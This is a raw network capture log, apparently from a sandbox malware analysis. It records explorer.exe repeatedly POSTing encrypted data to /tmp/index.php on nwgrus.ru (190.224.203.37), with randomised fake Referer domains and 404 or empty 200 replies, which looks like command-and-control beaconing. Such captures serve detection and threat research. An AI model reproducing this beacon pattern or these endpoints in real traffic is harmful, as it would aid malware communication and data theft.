Oct 12, 2024 23:27:34.823142052 CEST	283	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://ddmlqgiwokgjnrjp.com/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 251 Host: nwgrus.ru
Oct 12, 2024 23:27:34.826426983 CEST	251	OUT	Data Raw: 3b 6e 52 62 86 c8 1e 22 df ae b4 0b 06 09 7b cc 77 0a bd 90 6d 01 92 67 0b 7d 08 e0 46 c3 c5 6c ee 2d b2 58 0e 1d 23 1d 9a ee 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 34 07 a1 92 Data Ascii: ;nRb"{wmg}Fl-X#? 9Yt M@NA .[k,vu4VB]tJ$?P%K:1qJGrz6CbO,&YLdPTrZ, (WkQo/Cbm[>M"A/T
Oct 12, 2024 23:27:36.503072023 CEST	152	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Sat, 12 Oct 2024 21:27:36 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 04 00 00 00 72 e8 87 e8 Data Ascii: r

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.4	49737	190.224.203.37	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 12, 2024 23:27:36.518877029 CEST	278	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://akwopxbyfda.org/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 131 Host: nwgrus.ru
Oct 12, 2024 23:27:36.518918991 CEST	131	OUT	Data Raw: 3b 6e 52 62 86 c8 1e 22 df ae b4 0b 06 09 7b cc 77 0a bd 90 6d 01 92 67 0b 7d 08 e0 46 c3 c5 6c ee 2d b2 58 0e 1d 23 1d 9a ee 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 0a 6b 2c 90 f5 76 0b 75 4b 0f a5 e4 Data Ascii: ;nRb"{wmg}Fl-X#? 9Yt M@NA -[k,vuKH*rhvf]#Ll7EH=#
Oct 12, 2024 23:27:37.896641970 CEST	484	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Sat, 12 Oct 2024 21:27:37 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED] Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.4	49738	190.224.203.37	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 12, 2024 23:27:37.906579971 CEST	278	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://hdugujrhcjt.org/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 258 Host: nwgrus.ru
Oct 12, 2024 23:27:37.906611919 CEST	258	OUT	Data Raw: 3b 6e 52 62 86 c8 1e 22 df ae b4 0b 06 09 7b cc 77 0a bd 90 6d 01 92 67 0b 7d 08 e0 46 c3 c5 6c ee 2d b2 58 0e 1d 23 1d 9a ee 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 0b 6b 2c 90 f5 76 0b 75 3b 0f b3 9b Data Ascii: ;nRb"{wmg}Fl-X#? 9Yt M@NA -[k,vu;TW}Q{64z'L1=*XV`XDK@RY2aBa&,s+M\[8(dY Q@-Ejfgmd@'}Ik
Oct 12, 2024 23:27:39.375077009 CEST	484	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Sat, 12 Oct 2024 21:27:39 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED] Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.4	49739	190.224.203.37	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 12, 2024 23:27:39.386974096 CEST	279	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://yqqseuuafdwk.org/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 254 Host: nwgrus.ru
Oct 12, 2024 23:27:39.386974096 CEST	254	OUT	Data Raw: 3b 6e 52 62 86 c8 1e 22 df ae b4 0b 06 09 7b cc 77 0a bd 90 6d 01 92 67 0b 7d 08 e0 46 c3 c5 6c ee 2d b2 58 0e 1d 23 1d 9a ee 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 08 6b 2c 90 f5 76 0b 75 33 19 dd a5 Data Ascii: ;nRb"{wmg}Fl-X#? 9Yt M@NA -[k,vu3Z~Q\=Td0}4a^\|h\#C-f#;mcNu,RS^k;\ZA&%f0dA[{dF^\d
Oct 12, 2024 23:27:40.760502100 CEST	137	IN	HTTP/1.1 200 OK Server: nginx/1.26.0 Date: Sat, 12 Oct 2024 21:27:40 GMT Content-Type: text/html; charset=utf-8 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.4	49740	190.224.203.37	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 12, 2024 23:27:40.770448923 CEST	283	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://pkgsugfsxnjdsjfs.com/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 206 Host: nwgrus.ru
Oct 12, 2024 23:27:40.770503998 CEST	206	OUT	Data Raw: 3b 6e 52 62 86 c8 1e 22 df ae b4 0b 06 09 7b cc 77 0a bd 90 6d 01 92 67 0b 7d 08 e0 46 c3 c5 6c ee 2d b2 58 0e 1d 23 1d 9a ee 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 09 6b 2c 90 f5 76 0b 75 2a 4a d2 ba Data Ascii: ;nRb"{wmg}Fl-X#? 9Yt M@NA -[k,vu*JRSdjNq?;Xez=O0REKVA~dD&QvDImWDQi
Oct 12, 2024 23:27:42.131206036 CEST	484	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Sat, 12 Oct 2024 21:27:41 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED] Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.4	49741	190.224.203.37	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 12, 2024 23:27:42.146588087 CEST	278	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://rwtmirjlqyc.net/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 247 Host: nwgrus.ru
Oct 12, 2024 23:27:42.146657944 CEST	247	OUT	Data Raw: 3b 6e 52 62 86 c8 1e 22 df ae b4 0b 06 09 7b cc 77 0a bd 90 6d 01 92 67 0b 7d 08 e0 46 c3 c5 6c ee 2d b2 58 0e 1d 23 1d 9a ee 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 0e 6b 2c 90 f5 76 0b 75 73 06 a7 ae Data Ascii: ;nRb"{wmg}Fl-X#? 9Yt M@NA -[k,vusRqxIj?y0RL_y~0d,M=v9.P[&!F<S0e0<x!x]9GZrpWQ5TA<FqesPx
Oct 12, 2024 23:27:43.503515005 CEST	137	IN	HTTP/1.1 200 OK Server: nginx/1.26.0 Date: Sat, 12 Oct 2024 21:27:43 GMT Content-Type: text/html; charset=utf-8 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.4	49742	190.224.203.37	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 12, 2024 23:27:43.513222933 CEST	282	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://qgmuajpjvyrttvq.org/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 200 Host: nwgrus.ru
Oct 12, 2024 23:27:43.513248920 CEST	200	OUT	Data Raw: 3b 6e 52 62 86 c8 1e 22 df ae b4 0b 06 09 7b cc 77 0a bd 90 6d 01 92 67 0b 7d 08 e0 46 c3 c5 6c ee 2d b2 58 0e 1d 23 1d 9a ee 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 0f 6b 2c 90 f5 76 0b 75 44 57 fe ee Data Ascii: ;nRb"{wmg}Fl-X#? 9Yt M@NA -[k,vuDW<hKweZ_c-2-Cl];v_$+'8Q#Sq(0iB\C)iuXB
Oct 12, 2024 23:27:44.876148939 CEST	137	IN	HTTP/1.1 200 OK Server: nginx/1.26.0 Date: Sat, 12 Oct 2024 21:27:44 GMT Content-Type: text/html; charset=utf-8 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.4	49743	190.224.203.37	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 12, 2024 23:27:44.890516996 CEST	282	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://pxoxujlnkixexhr.net/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 277 Host: nwgrus.ru
Oct 12, 2024 23:27:44.890553951 CEST	277	OUT	Data Raw: 3b 6e 52 62 86 c8 1e 22 df ae b4 0b 06 09 7b cc 77 0a bd 90 6d 01 92 67 0b 7d 08 e0 46 c3 c5 6c ee 2d b2 58 0e 1d 23 1d 9a ee 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 0c 6b 2c 90 f5 76 0b 75 53 29 fa 89 Data Ascii: ;nRb"{wmg}Fl-X#? 9Yt M@NA -[k,vuS)n\g[15`q\|?\6`GXIxc;KTyM($KTRV9[<o')Y.-PAHu[WJI@&
Oct 12, 2024 23:27:46.242913961 CEST	484	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Sat, 12 Oct 2024 21:27:45 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED] Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.4	49744	190.224.203.37	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 12, 2024 23:27:46.255208969 CEST	278	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://kklpocdpdsv.net/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 358 Host: nwgrus.ru
Oct 12, 2024 23:27:46.255251884 CEST	358	OUT	Data Raw: 3b 6e 52 62 86 c8 1e 22 df ae b4 0b 06 09 7b cc 77 0a bd 90 6d 01 92 67 0b 7d 08 e0 46 c3 c5 6c ee 2d b2 58 0e 1d 23 1d 9a ee 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 0d 6b 2c 90 f5 76 0b 75 62 32 a5 ea Data Ascii: ;nRb"{wmg}Fl-X#? 9Yt M@NA -[k,vub2[DCL</cd9\(xnwYV5\|LG2RJi32P^(V=[9o3(R~yPhI+M6k\/7 Q
Oct 12, 2024 23:27:47.657882929 CEST	484	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Sat, 12 Oct 2024 21:27:47 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED] Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.4	49745	190.224.203.37	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 12, 2024 23:27:47.668030024 CEST	278	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://mubqagferfk.net/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 319 Host: nwgrus.ru
Oct 12, 2024 23:27:47.668064117 CEST	319	OUT	Data Raw: 3b 6e 52 62 86 c8 1e 22 df ae b4 0b 06 09 7b cc 77 0a bd 90 6d 01 92 67 0b 7d 08 e0 46 c3 c5 6c ee 2d b2 58 0e 1d 23 1d 9a ee 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 02 6b 2c 90 f5 76 0b 75 20 49 d7 a0 Data Ascii: ;nRb"{wmg}Fl-X#? 9Yt M@NA -[k,vu IN9zjaCX rGD'*&tZ+O~+3Xz_{QECOoRLJa\dq^1U'BuN2,l
Oct 12, 2024 23:27:49.038738966 CEST	137	IN	HTTP/1.1 200 OK Server: nginx/1.26.0 Date: Sat, 12 Oct 2024 21:27:48 GMT Content-Type: text/html; charset=utf-8 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.4	49746	190.224.203.37	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 12, 2024 23:27:49.048058987 CEST	281	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://imnnydowlgvnht.net/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 365 Host: nwgrus.ru
Oct 12, 2024 23:27:49.048110962 CEST	365	OUT	Data Raw: 3b 6e 52 62 86 c8 1e 22 df ae b4 0b 06 09 7b cc 77 0a bd 90 6d 01 92 67 0b 7d 08 e0 46 c3 c5 6c ee 2d b2 58 0e 1d 23 1d 9a ee 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 03 6b 2c 90 f5 76 0b 75 60 08 cf 8d Data Ascii: ;nRb"{wmg}Fl-X#? 9Yt M@NA -[k,vu`UOKO1A+ =YnPVO.\|0CE@a/kr<{\6Qb66+=M4&b~#A(qmK"10
Oct 12, 2024 23:27:50.401794910 CEST	484	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Sat, 12 Oct 2024 21:27:50 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED] Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.2.4	49747	190.224.203.37	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 12, 2024 23:27:50.411030054 CEST	280	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://jodccroecnfoy.com/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 346 Host: nwgrus.ru
Oct 12, 2024 23:27:50.411051989 CEST	346	OUT	Data Raw: 3b 6e 52 62 86 c8 1e 22 df ae b4 0b 06 09 7b cc 77 0a bd 90 6d 01 92 67 0b 7d 08 e0 46 c3 c5 6c ee 2d b2 58 0e 1d 23 1d 9a ee 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 00 6b 2c 90 f5 76 0b 75 27 58 e8 96 Data Ascii: ;nRb"{wmg}Fl-X#? 9Yt M@NA -[k,vu'Xh(^OI?n9NtBLR'P!FxyF6L#2<}1/ze3+WTbky>2v[XiX_w
Oct 12, 2024 23:27:51.780636072 CEST	484	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Sat, 12 Oct 2024 21:27:51 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED] Data 